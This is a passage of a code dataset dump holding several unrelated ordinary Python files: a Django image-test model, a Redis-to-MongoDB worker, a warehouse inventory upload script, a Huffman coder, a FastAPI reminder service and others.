on_appendAndEditAction_trigger(self):\r\n def code():\r\n current_index = self.currentIndex()\r\n\r\n current_data = self.model.psrs[0].fields[self.model.filtered_indexes[current_index.row()]].current_data\r\n\r\n self.model.setData(current_index, current_data)\r\n\r\n self.edit(current_index)\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def on_appendAndEditWithSignatureAction_trigger(self):\r\n '''Append and Edit with Signature, only if the field is of type \"text_area\". Otherwise, simply append and edit.'''\r\n def code():\r\n current_index = self.currentIndex()\r\n current_data = self.model.psrs[0].fields[self.model.filtered_indexes[current_index.row()]].current_data\r\n if self.model.psrs[0].fields[self.model.filtered_indexes[current_index.row()]].write_element_type == WriteElementTypes.text_area:\r\n self.model.setData(current_index, current_data + u'\\n\\n{} {} - '.format(asset.credentials()['Abbreviated Name'], datetime.now().strftime('%m/%d/%Y')))\r\n else:\r\n self.model.setData(current_index, current_data)\r\n self.edit(current_index)\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def on_writeNullValueAction_trigger(self):\r\n def code():\r\n self.model.setData(self.currentIndex(), QtCore.QString(''))\r\n\r\n common.run_scary_code(self, code, show_wait_cursor = True)\r\n\r\n def keyPressEvent(self, event):\r\n if event.matches(QtGui.QKeySequence.Copy):\r\n self.on_copyDataAction_trigger()\r\n else:\r\n super(PSRRawDataTableView, self).keyPressEvent(event)\r\n\r\n def on_reloadDataAction_trigger(self):\r\n pass\r\n","sub_path":"widget/finale/obj/psr_raw_data_table_view.py","file_name":"psr_raw_data_table_view.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61845643","text":"\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nfrom PIL import Image\nimport numpy as np\nfrom django.conf import settings\nfrom pathlib import Path\nimport os\nfrom .utils import get_oncho_images\nfrom .utils import get_schisto_images\nfrom .utils import get_lf_images\nfrom .utils import get_helminths_images\n\nfrom django.core.files.base import ContentFile\nfrom io import BytesIO\n\n# Create your models here.\nclass Test(models.Model):\n \n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=200, null=True, blank=True)\n age = models.IntegerField( null=True, blank=True)\n sex = models.CharField(max_length=200, null=True, blank=True)\n location = models.CharField(max_length=200, null=True, blank=True)\n created_at = models.DateField(auto_now=True)\n oncho =models.CharField(max_length=200, null=True, blank=True)\n schisto =models.CharField(max_length=200, null=True, blank=True)\n lf = models.CharField(max_length=200, null=True, blank=True)\n helminths = models.CharField(max_length=200, null=True, blank=True)\n \n onchoImage = models.ImageField(null=True,blank=True)\n schistoImage = models.ImageField(null=True,blank=True)\n lfImage = models.ImageField(null=True,blank=True)\n helminthsImage = models.ImageField(null=True,blank=True)\n \n \n def __str__(self):\n return self.name\n\n def getCount(self):\n ocount = self.oncho.count()\n\n\n\n\n def save(self, *args, **kwargs):\n \n \n \n #open image\n onc_img = Image.open(self.onchoImage)\n sch_img = Image.open(self.schistoImage)\n lf_img = Image.open(self.lfImage)\n hel_img = Image.open(self.helminthsImage)\n \n \n\n # convert image to array and process\n onc_img = np.array(onc_img)\n sch_img = np.array(sch_img)\n lf_img = np.array(lf_img)\n hel_img = np.array(hel_img)\n\n oncho_result = get_oncho_images(onc_img)\n sch_result = get_schisto_images(sch_img)\n lf_result = get_lf_images(lf_img)\n hel_result = get_helminths_images(hel_img)\n\n\n if oncho_result < 2 :\n \n print('Negative')\n self.oncho = \"Negative\"\n elif oncho_result == 2:\n \n self.oncho = \"Positive\"\n print('Positive')\n elif oncho_result> 2:\n self.oncho = \"Not Valid\"\n print('Not Valid')\n #schisto result\n if sch_result < 2 :\n \n print('Negative')\n self.schisto = \"Negative\"\n elif sch_result == 2:\n\n self.schisto = \"Positive\"\n print('Positive')\n elif sch_result> 2:\n self.schisto = \"Not Valid\"\n print('Not Valid')\n \n #lf result\n if lf_result < 2 :\n \n print('Negative')\n self.lf = \"Negative\"\n elif lf_result == 2:\n self.lf = \"Positive\"\n print('Positive')\n elif lf_result> 2:\n self.lf = \"Not Valid\"\n print('Not Valid')\n \n #helminths\n if hel_result < 2 :\n \n print('Negative')\n self.helminths = \"Negative\"\n elif hel_result == 2:\n \n self.helminths = \"Positive\"\n print('Positive')\n elif hel_result> 2:\n self.helminths = \"Not Valid\"\n print('Not Valid')\n \n\n \n \n \n super().save(*args, **kwargs) # Call the \"real\" save() method.\n # do_something_else()\n \n\n\n\n\n\n# from django.contrib.staticfiles.storage import staticfiles_storage\n# from django.db import models\n# from django.contrib.auth.models import User\n# import cv2\n# from PIL import Image\n# import numpy as np\n# from django.conf import settings\n# from django.core.files.storage import get_storage_class\n# from .utils import get_images\n# from io import BytesIO\n# # Create your models here.\n# class Test(models.Model):\n# user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n# name = models.CharField(max_length=200, null=True, blank=True)\n# age = models.IntegerField( null=True, blank=True)\n# sex = models.CharField(max_length=200, null=True, blank=True)\n# location = models.CharField(max_length=200, null=True, blank=True)\n# onchoImage = models.ImageField(upload_to='images')\n# pil_img = Image.open(onchoImage)\n# # img_name = pil_img.filename\n# # print('image name is' +img_name)\n\n# # convert image to array and process\n# cv_img = np.array(pil_img)\n# img = get_images(cv_img)\n\n# img = get_images(cv_img)\n\n \n \n# if img < 2 :\n# oncho =models.CharField(max_length=200, default='Negative')\n# elif img== 2:\n# oncho =models.CharField(max_length=200,default='Positive')\n# elif img > 2:\n# oncho =models.CharField(max_length=200,default='Not Valid')\n \n# print('number of lines in test is ', img)\n# schisto =models.CharField(max_length=200, null=True, blank=True)\n# lf = models.CharField(max_length=200, null=True, blank=True)\n# helminths = models.CharField(max_length=200, null=True, blank=True)\n# enteredAt = models.DateTimeField(auto_now_add=True)\n \n# schistoImage = models.ImageField(null=True,blank=True)\n# lfImage = models.ImageField(null=True,blank=True)\n# helminthsImage = models.ImageField(null=True,blank=True)\n \n \n# def __str__(self):\n# return self.name\n# def save(self, *args, **kwargs):\n \n# #open image\n\n# pil_img = Image.open(self.onchoImage)\n# # img_name = pil_img.filename\n# # print('image name is' +img_name)\n\n# # convert image to array and process\n# cv_img = np.array(pil_img)\n# img = get_images(cv_img)\n\n# # #conver back to image\n# # im_pil = Image.fromarray(img)\n \n\n# # print('number of lines in test is ', len(contours)/2 )\n\n# # if img== 0:\n# # oncho_value = \"Not Valid 0\"\n \n\n# super().save(*args, **kwargs) # Call the \"real\" save() method.\n# # do_something_else()\n \n\n\n","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121084976","text":"#!/usr/bin/python2\n\"\"\"worker to read presence records from redis and write to mongodb\"\"\"\n\nfrom pymongo import MongoClient\nimport syslog\nimport redis\nimport json\nimport time\nimport datetime\nfrom argparse import ArgumentParser\n\n#from riemann import RiemannClient, RiemannUDPTransport\n\n#rmmonitor = RiemannClient(transport = RiemannUDPTransport,\n#host=config.riemann['host'])\n\n#ok_response = {'status': 'ok'}\n\nINQNAME = \"oemap_db_worker_in_queue\"\nREPLYTO = \"oemap_www_nodejs_in_queue\"\n\nclass DbWorker():\n \n def __init__ (self):\n\n parser = ArgumentParser()\n parser.add_argument('-n', '--job', dest='job', action='store', \n help='worker instance id')\n self.args = parser.parse_args()\n self.rhost = \"127.0.0.1\"\n self.rport = 6379\n self.starttime = datetime.datetime.now()\n self.statc = 0\n self.stati = 0\n self.database = None\n \n def stats(self):\n self.statc = self.statc + 1\n self.stati = self.stati + 1\n if self.stati == 10000:\n now = datetime.datetime.now()\n dur = now - self.starttime\n rate = ''\n if dur.seconds > 0:\n rate = str(self.stati / dur.seconds) + \" per second\"\n else:\n rate = \"1000+ per second\"\n self.log_notice(\"processed %s records. rate was %s.\" % \n (self.statc, rate))\n self.stati = 0\n self.starttime = now\n \n FIVE_MIN_IN_SECS = 60 * 5\n ONE_HOUR_IN_SECS = 60 * 60\n ONE_DAY_IN_SECS = ONE_HOUR_IN_SECS * 24\n\n def setExpireTime(self, rec):\n now = datetime.datetime.now()\n ttl = rec['ttl']\n if ttl == 1:\n rec['exp_time'] = now + datetime.timedelta(0, FIVE_MIN_IN_SECS)\n elif ttl == 2:\n rec['exp_time'] = now + datetime.timedelta(0, ONE_HOUR_IN_SECS)\n elif ttl == 3:\n rec['exp_time'] = now + datetime.timedelta(0, ONE_DAY_IN_SECS)\n else:\n rec['exp_time'] = now # ready for sweeper\n\n def run (self):\n\n while True:\n try:\n self.log_notice('%s Python impl starting queue %s' % (\"test\", INQNAME))\n \n rdis = redis.Redis(host=self.rhost, port=self.rport)\n client = MongoClient()\n self.database = client.oemap_test\n \n while True:\n \n (_, msg) = rdis.brpop(keys=[INQNAME], timeout=600)\n \n if msg == None: \n continue\n \n rec = json.loads(msg)\n \n self.log_debug(\"updating %s for %s\" % (rec['_id'], \n rec['label']))\n\n self.setExpireTime(rec)\n \n self.database.presences.save(rec)\n \n self.stats()\n \n except Exception:\n self.handle_exception()\n time.sleep(1)\n except: # catch *all* exceptions\n self.handle_exception()\n time.sleep(1)\n \n def log_debug (self, msg):\n syslog.syslog(syslog.LOG_DEBUG, \"%s %s\" % (self.args.job, msg))\n\n def log_notice (self, msg):\n syslog.syslog(syslog.LOG_NOTICE, \"%s %s\" % (self.args.job, msg))\n\n def log_error (self, msg):\n syslog.syslog(syslog.LOG_ERR, \"%s %s\" % (self.args.job, msg))\n\n def handle_exception(self):\n import traceback\n formatted_lines = traceback.format_exc().splitlines()\n for line in formatted_lines:\n self.log_error(line)\n\nif __name__ == \"__main__\":\n\n DbWorker().run()\n\n","sub_path":"modules/db_worker/DbWorker.py","file_name":"DbWorker.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"63172350","text":"#!/usr/bin/env python3\n\nimport argparse\nimport re\nimport soundex\nimport string\nimport sys\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"get command-line arguments\"\"\"\n parser = argparse.ArgumentParser(\n description='Use Soundex to find rhyming words',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('word', metavar='str', help='Word')\n\n parser.add_argument('-w',\n '--wordlist',\n metavar='str',\n help='Wordlist',\n default='/usr/share/dict/words')\n\n return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n args = get_args()\n word = args.word\n wordlist = args.wordlist\n\n stem = word\n consonants = [c for c in string.ascii_lowercase if c not in 'aeiou']\n regex = re.compile('^[' + ''.join(consonants) + ']+(.+)')\n\n def stemmer(word):\n match = regex.search(word)\n return match.group(1) if match else word\n\n sndx = soundex.Soundex()\n cmp = sndx.soundex(stemmer(word))\n\n for line in open(wordlist):\n for w in line.split():\n if w != word and sndx.soundex(stemmer(w)) == cmp:\n print(w)\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"soundex_rhymer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"148743455","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Created on 2019-08-08 15:31\nfrom django.conf.urls import url\n\nfrom Admin import views\n\nurlpatterns = [\n # 左侧边栏路由\n\n url(r'^home/$', views.home, name='home'),\n url(r'^user/$', views.user, name='user'),\n url(r'^user/(\\d+)/$', views.user, name='user1'),\n url(r'^music/(\\d+)/(\\d+)/$', views.music, name='music'),\n url(r'^musmv/$', views.musmv, name='musmv'),\n url(r'^musmv/(\\d+)/$', views.musmv, name='musmv1'),\n\n url(r'^point/$', views.point, name='point'),\n url(r'^adlog/$', views.adlog, name='adlog'),\n url(r'^pastlog/$', views.pastlog, name='pastlog'),\n url(r'^dellog/$', views.dellog, name='dellog'),\n\n\n url(r'^spread/$', views.spread, name='spread'),\n url(r'^location/$', views.location, name='location'),\n url(r'^staruser/$', views.staruser, name='staruser'),\n url(r'^documentation/$', views.documentation, name='documentation'),\n url(r'^feedback/(\\d+)$', views.feedback, name='feedback'),\n url(r'^translation/$', views.translation, name='translation'),\n\n # 登录路由\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n\n # 管理员管理用户url\n url(r'^add/$', views.add, name='add'),\n url(r'^select/$', views.select, name='select'),\n url(r'^select/(\\d+)/$', views.select, name='select1'),\n url(r'^comeback_user/$', views.comeback_user, name='comeback_user'),\n url(r'^select2/(\\d+)/$', views.select2, name='select2'),\n url(r'^addsuccess/$', views.add_success, name='add_success'),\n url(r'^showall/(\\w+)$', views.show_all, name='show_all'),\n url(r'^dorecover/(\\w+)$', views.do_recover, name='do_recover'),\n url(r'^dodelete/(\\w+)$', views.do_delete, name='do_delete'),\n url(r'^doupdate/(\\w+)$', views.do_update, name='do_update'),\n\n # 管理员管理mv\n url(r'^showmvall/(\\w+)$', views.show_allmv, name='show_mvall'),\n url(r'^show_mvall_select/$', views.show_allmv_select, name='show_mvall_select1'),\n url(r'^show_mvall_select/(\\w+)$', views.show_allmv_select, name='show_mvall_select'),\n url(r'^show_allmv_select_next/(\\w+)$', views.show_allmv_select_next, name='show_allmv_select_next'),\n url(r'^mv_recover/(\\w+)$', views.mv_recorver, name='mv_recover'),\n url(r'^mv_delete/(\\w+)$', views.mv_delete, name='mv_delete'),\n url(r'^mv_upgrade/(\\w+)$', views.mv_upgrade, name='mv_upgrade'),\n\n url(r'show_music_all/(\\d+)/(\\d+)/$', views.show_music_all, name='show_music_all'),\n url(r'delete_email/(\\d+)/$', views.delete_email, name='delete_email'),\n url(r'reply_email/(.+)/$', views.reply_email, name='reply_email'),\n\n # url(r'mytest/$', views.test, name='mytest')\n\n]\n","sub_path":"Admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"195082719","text":"import requests\nimport json\nimport xlrd\n\n# 为lot表和location_inventory添加商品库位数据 空库位盘盈接口 path = 'D:/dataInsert/tf/111.xlsx'\n\n\n# excel所有内容\nlist = []\n# 目录数据\ncategory_code_id_dicts = {}\ncategory_code_path_dicts = {}\ncategory_code_name_dicts = {}\nbrand_name_id_dicts = {}\n# url http://wms.365sslunch.com/owms-web/locationInventory/emptySpaceExtraAdjust\n# payload {\"toQty\":\"5\",\"toLocationCode\":\"C-02C9\",\"toStatus\":\"normal\",\"lotTemplateId\":null,\"itemId\":994794,\"lotAttrValue\":\"{}\",\"toCargownerId\":1088961,\"toCargownerCode\":\"TFSP\"}\n# response {\"code\":\"0\",\"message\":\"成功\"}\n# 空库位盘盈请求头\nheadersAdd = {\n 'Host': 'wms.365sslunch.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\n 'Accept': 'application/json, text/plain, */*',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': 'http://wms.365sslunch.com/',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Content-Length': '165',\n 'Connection': 'keep-alive',\n 'Cookie': 'user_name=xiangqi; company_code=tianfang; id=90; UT=USER_SESSION_xiangqi_PLATFORM_0',\n 'Origin': 'http://wms.365sslunch.com'\n}\n\n# url http://wms.365sslunch.com/owms-web/item/listPage\n# payload {\"page\":1,\"limit\":10,\"filters\":{\"code\":\"33040371\",\"name\":\"\"}}\n# response {code: \"0\", message: \"成功\", totalPages: 1, total: 1,…}\n # code: \"0\"\n # data: [{id: 994794, createUserid: 113, createTime: \"2019-07-04 14:16:04\", updateUserid: null,…}]\n # message: \"成功\"\n # total: 1\n # totalPages: 1\n# 拉去itemId 请求头\nheadersQuery = {\n 'Host': 'wms.365sslunch.com',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\n 'Accept': 'application/json, text/plain, */*',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Accept-Encoding': 'gzip, deflate',\n 'Referer': 'http://wms.365sslunch.com/',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Content-Length': '61',\n 'Connection': 'keep-alive',\n 'Cookie': 'user_name=xiangqi; company_code=tianfang; id=90; UT=USER_SESSION_xiangqi_PLATFORM_0',\n 'Origin': 'http://wms.365sslunch.com'\n}\n\n\ndef read_excel():\n path = 'D:/dataInsert/tf/111.xlsx'\n # 打开execl\n workbook = xlrd.open_workbook(path)\n # 根据sheet索引或者名称获取sheet内容\n Data_sheet = workbook.sheets()[0] # 通过索引获取\n rowNum = Data_sheet.nrows # sheet行数\n colNum = Data_sheet.ncols # sheet列数\n\n # 获取所有单元格的内容\n for i in range(rowNum):\n if i == 0:\n continue\n rowlist = []\n for j in range(colNum):\n rowlist.append(Data_sheet.cell_value(i, j))\n list.append(rowlist)\n\n\ndef exec(one_row):\n\n # 商品导入\n item_code = str(one_row[2]).split('.')[0]\n item_desc = one_row[3].replace(\"\\\"\",\"\")\n forien_desc = one_row[4]\n category = one_row[5]\n house_code = str(one_row[7]).split('.')[0]\n house_name = one_row[8]\n to_qty = one_row[9]\n uom = one_row[10]\n\n # 查询商品id\n base_data = '{\"page\":1,\"limit\":10,\"filters\":{\"code\":\"%s\",\"name\":\"\"}}' % item_code\n url = 'http://wms.365sslunch.com/owms-web/item/listPage'\n r = requests.post(url, headers=headersQuery, data=str(base_data).encode(\"utf-8\"))\n item_id = json.loads(r.text)['data'][0]['id']\n print(item_id)\n\n # 空库位盘盈 库位处理house_code 例如 301 处理为 3-0-1\n house_code = '-'.join(house_code)\n url = 'http://wms.365sslunch.com/owms-web/locationInventory/emptySpaceExtraAdjust'\n base_data = '{\"toQty\":\"%s\",\"toLocationCode\":\"%s\",\"toStatus\":\"normal\",\"lotTemplateId\":null,\"itemId\":\"%s\",\"lotAttrValue\":\"{}\",\"toCargownerId\":1088961,\"toCargownerCode\":\"TFSP\"}' % (to_qty,house_code,item_id)\n a = requests.post(url, headers=headersAdd, data=str(base_data).encode(\"utf-8\"))\n print(a.text)\n\nif __name__ == '__main__':\n read_excel()\n for one_row in list:\n try :\n exec(one_row)\n except:\n print('err')\n continue","sub_path":"tf/product2.py","file_name":"product2.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"508986900","text":"#!/usr/bin/env python\n\nfrom setuptools import setup, find_packages\n\n\nwith open('README.txt') as file:\n long_description = file.read()\n\nsetup(name='dockyard',\n version='0.2',\n description='Light-weight CLI for development using Vagrant + Docker',\n long_description=long_description,\n author='Joshua Bellamy-Henn',\n author_email='josh@psidox.com',\n url='https://github.com/smysnk/dockyard',\n install_requires=['python-vagrant>=0.5.0', 'docker-py>=0.3.2'],\n keywords=\"docker vagrant dockyard\",\n packages=find_packages(),\n entry_points={\n 'console_scripts':\n ['dockyard = dockyard.entry:main'],\n }\n )","sub_path":"pypi_install_script/dockyard-0.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609436186","text":"\"\"\"a method for the construction of minimum-redundancy codes. Huffman\"\"\"\n\nfrom bit_array import BitArray\nfrom huffman_trie import HuffmanTrie\n\nfrom collections import defaultdict, Counter\nfrom heapq import heappush, heappop, heapify\n\n\nclass HuffmanCode(object):\n \"\"\"allows object encoding and decoding\"\"\"\n def __init__(self, message):\n self.code = self.generate_code(self.to_frequency(Counter(message)))\n self.sym_length = defaultdict(int)\n for (sym, bin_code) in self.code.items():\n self.sym_length[sym] = len(bin_code)\n\n def to_frequency(self, symbol_count):\n \"\"\"get the frequency of each symbol in the message\"\"\"\n frequencies = []\n total = sum(symbol_count.values())\n for (symbol, count) in symbol_count.items():\n frequencies.append((count / total, [symbol]))\n return frequencies\n\n def generate_code(self, frequency_table):\n \"\"\"generates binary code for each symbol\n use the exact same encoding as in the article\"\"\"\n heapify(frequency_table)\n code = defaultdict(list)\n while len(frequency_table) > 1:\n one = heappop(frequency_table)\n zero = heappop(frequency_table)\n for sym in one[1]:\n code[sym].append(1)\n for sym in zero[1]:\n code[sym].append(0)\n heappush(frequency_table, (one[0] + zero[0], one[1] + zero[1]))\n sym_to_string = defaultdict(str)\n for (symbol, binary) in code.items():\n bin_str = \"\".join([str(i) for i in reversed(binary)])\n sym_to_string[symbol] = bin_str\n return sym_to_string\n\n def encode(self, message):\n \"\"\"huffman code the message into bits\"\"\"\n bit_size = 0\n for sym in message:\n bit_size += self.sym_length[sym]\n\n bit_array = BitArray(bit_size)\n\n position = 0\n for sym in message:\n for bit in self.code[sym]:\n if bit == '1':\n bit_array.set_bit(position)\n position += 1\n\n return bit_array\n\n def decode(self, bit_array):\n \"\"\"decode the message previously encoded with the code\"\"\"\n assert isinstance(bit_array, BitArray)\n decode_trie = HuffmanTrie()\n for (symbol, code) in self.code.items():\n decode_trie.add_code(symbol, code)\n\n return decode_trie.decode(bit_array.get_bits())\n\n\n__all__ = [\"HuffmanCode\"]\n","sub_path":"src/huffman_code.py","file_name":"huffman_code.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189636482","text":"import sys, os\nmyPath = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, myPath + '/../PDS/')\n\nimport pytest\nimport asyncio\nimport json\nimport base64\n\nfrom web3 import Web3\nfrom pds import PDS\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef deploy_ganache():\n import subprocess\n import time\n global w3, abi, account, address\n p1 = subprocess.Popen(['ganache-cli', '-m', 'myth like bonus scare over problem client lizard pioneer submit female collect']) #use this mnemonic to much the contract address in configuration\n time.sleep(10) #Otherwise the server is not ready when tests start\n w3 = Web3(Web3.HTTPProvider(\"HTTP://127.0.0.1:8545\"))\n with open('conf/contract/build/PDS.abi', 'r') as myfile:\n abi = myfile.read()\n with open('conf/contract/build/PDS.bin', 'r') as myfile:\n binfile = myfile.read()\n account = w3.eth.accounts[0]\n PDSContract = w3.eth.contract(abi=abi, bytecode=binfile)\n tx_hash = PDSContract.constructor().transact({'from': account})\n tx_receipt = w3.eth.waitForTransactionReceipt(tx_hash)\n address = tx_receipt.contractAddress\n yield\n p1.kill()\n\n@pytest.mark.asyncio\nasync def test_log_token():\n global w3, abi, account, address\n pds = PDS()\n logged_token = 'Od7Fsc5Z68fSaC4PNu0t1eXYr8tI7no28aXjCEypjxjohc0PwkItlVTjCduAOwlwg3gtIdcSXufv5WYuowoV9Hak8yWMy_74SZe06Fs4DfrMRDJZsAXSYac08tmTvu440VkXfZwZ7NouoQbZgMCzPL6jxKWwV2hN06ti4GCFRR6TbymgZeFroeTH3WT9iM-Lo1mtr0bWsH93qsXIlHK0IOaMwskjPJHSKwOoFIW84DFHSHY0TdUn8U_fKz55oEwd5x5WyHeu_OVVqO03GgToZN_tPp_6vjxDPtwzHZYRmiYX08oWKotHAPGloqyMmt3MHOlwag1YFHcxMvHx0Gw9t6NUHRMhU3J9EEhE4UgS6Ol-G9ea-qeCRc_WEzgMukjfxb-wGfPCRFlNyYOJt1XxI2whTbKj_wao0kN17NHIT6suFPEDnW7DBsyYEG8cXO5MLzKkDplLSVnet7xTWMmnPlm6yR8hwXeE0MHjpWeLu0Lw-uJ6aKu2fVla-aaD8d6w05MFURsgiUwjjSf7omlABeuI6KCQWO_rTqSPZ4yx7e7GO7YY4cvpw1IxK1jbxHVaY-8dCHyXyDCUhBXvfGJXHJx--n-KyLVo7tXy5dbd2j4K8-MD0EDTPmbar8OBnlyKO5rG9PqWOjEkEcu8t-WfGpbTcw=='\n logged_did = '4qk3Ab43ufPQVif4GAzLUW'\n PDSContract_instance = w3.eth.contract(abi=abi, address=address)\n code, result = pds.log_token(logged_did, logged_token, w3, account, PDSContract_instance)\n DID, enc_token = PDSContract_instance.functions.get_token(0).call()\n assert (DID != None)\n assert (enc_token != None)","sub_path":"tests/test_logging.py","file_name":"test_logging.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55347589","text":"\"\"\"\nEndpoints for reminders and daily messages\n\"\"\"\nimport datetime\nimport os\nimport pickle\nimport random\nfrom fastapi import FastAPI\nfrom messages import reminders\nfrom messages import senior_qa_training\napp = FastAPI()\n\nCURR_FILE_PATH = os.path.dirname(os.path.abspath(__file__))\nMESSAGES_PATH = os.path.join(CURR_FILE_PATH, 'messages')\nCULTURE_FILE = os.path.join(MESSAGES_PATH, 'culture.txt')\nSEP20_INTERNS_FILE = os.path.join(MESSAGES_PATH, 'sep20_interns.txt')\nSENIOR_QA_TRAINING_PICKLE = os.path.join(MESSAGES_PATH, 'senior_qa_training.pickle')\n\ndef get_pickle_contents(filename):\n \"Return the first variable of a pickle file\"\n contents = None\n if os.path.exists(filename):\n with open(filename, 'rb') as file_handler:\n contents = pickle.load(file_handler)\n\n return contents\n\ndef update_pickle_contents(filename, content):\n \"Update the contents of the pickle file\"\n with open(filename, 'wb+') as file_handler:\n pickle.dump(content, file_handler)\n\ndef get_senior_qa_training_user_index():\n \"Return the user index dict\"\n user_index_dict = get_pickle_contents(SENIOR_QA_TRAINING_PICKLE)\n user_index_dict = {} if user_index_dict is None else user_index_dict\n\n return user_index_dict\n\ndef set_senior_qa_training_user_index(user_index_dict):\n \"Update the user index for the senior QA training messages\"\n update_pickle_contents(SENIOR_QA_TRAINING_PICKLE, user_index_dict)\n\ndef get_weekday():\n \"Return the weekday\"\n return datetime.datetime.today().weekday()\n\ndef get_messages_from_file(filename):\n \"Return a list of culture related messages\"\n lines = []\n with open(filename, 'r') as file_handler:\n lines = file_handler.readlines()\n\n return lines\n\n@app.get(\"/\")\ndef index():\n \"The home page\"\n return {\"msg\":\"This is the endpoint for the home page. /message \\\n and /reminder are more useful starting points.\"}\n\n@app.get(\"/message\")\ndef get_message():\n \"Return a random message\"\n lines = get_messages_from_file(CULTURE_FILE)\n message = random.choice(lines)\n\n return {'msg':message.strip()}\n\n@app.get(\"/reminder\")\ndef get_reminder():\n \"Return a reminder based on day of the week\"\n weekday = get_weekday()\n #Note: Monday is 0 and Sunday is 6\n lines = reminders.messages.get(weekday, [''])\n message = \"Reminder: \" + random.choice(lines)\n\n return {'msg':message.strip()}\n\n@app.get(\"/sep20-interns\")\ndef get_sep20_message():\n \"Return a message for the Sep 2020 internship\"\n lines = get_messages_from_file(SEP20_INTERNS_FILE)\n\n return {'msg': random.choice(lines).strip()}\n\n@app.get(\"/training\")\ndef get_snior_qa_training_message(user: str = ''):\n \"Return a message for senior QA training\"\n lines = senior_qa_training.messages\n user_index_dict = {}\n if user:\n user_index_dict = get_senior_qa_training_user_index()\n message_index = user_index_dict.get(user, 0)\n message = lines[message_index%len(lines)]\n user_index_dict[user] = message_index + 1\n set_senior_qa_training_user_index(user_index_dict)\n else:\n message = random.choice(lines).strip()\n\n return {'msg': message}\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"337957486","text":"from opulence.common.fields import StringField\nfrom opulence.facts.bases import BaseFact\n\n\nclass Airline(BaseFact):\n _name_ = \"airline\"\n _description_ = \"Represent a airline company\"\n _author_ = \"Henry\"\n _version_ = 1\n\n def setup(self):\n self.name = StringField(mandatory=True)\n self.code_iata = StringField()\n self.code_icao = StringField()\n self.fullname = StringField()\n\n def get_summary(self):\n return \"{}\".format(self.name.value)\n","sub_path":"opulence/facts/modules/transport/airline.py","file_name":"airline.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131648863","text":"def juge_palindrome(str):\n length = len(str)\n print(length)\n for i in range(int(length / 2)):\n if not str[i] == str[0-i-1]:\n print(\"{}不是回文数\".format(str))\n return\n print(\"{}是回文数\".format(str))\n\n\nnum = input(\"请输入一个整数:\")\njuge_palindrome(num)","sub_path":"课堂练习/练习3/练习3-4.py","file_name":"练习3-4.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"526591829","text":"\"\"\"\nThis file provides the template for designing the agent and environment.\n\nThe below hyperparameters must be assigned to a value for the algorithm to work\nproperly.\n\"\"\"\n\nimport numpy as np\nfrom hac.environment import UR5\nfrom hac.agent import Agent\n\n\ndef design_agent_and_env(flags):\n \"\"\"Instantiate the Agent and Environment classes for training.\n\n TODO\n\n Parameters\n ----------\n flags : argparse.Namespace\n the parsed arguments from the command line (see options.py)\n\n Returns\n -------\n hac.Agent\n the agent class\n hac.Environment\n the training environment\n \"\"\"\n # ======================================================================= #\n # Step 1. Design agent #\n # #\n # The key hyperparameters for agent construction are #\n # #\n # a. Number of levels in agent hierarchy #\n # b. Max sequence length in which each policy will specialize #\n # c. Max number of atomic actions allowed in an episode #\n # d. Environment timesteps per atomic action #\n # #\n # See Section 3 of this file for other agent hyperparameters that can be #\n # configured. #\n # ======================================================================= #\n\n # Enter max number of atomic actions. This will typically be\n # flags.time_scale**(flags.layers). However, in the UR5 Reacher task, we\n # use a shorter episode length.\n max_actions = 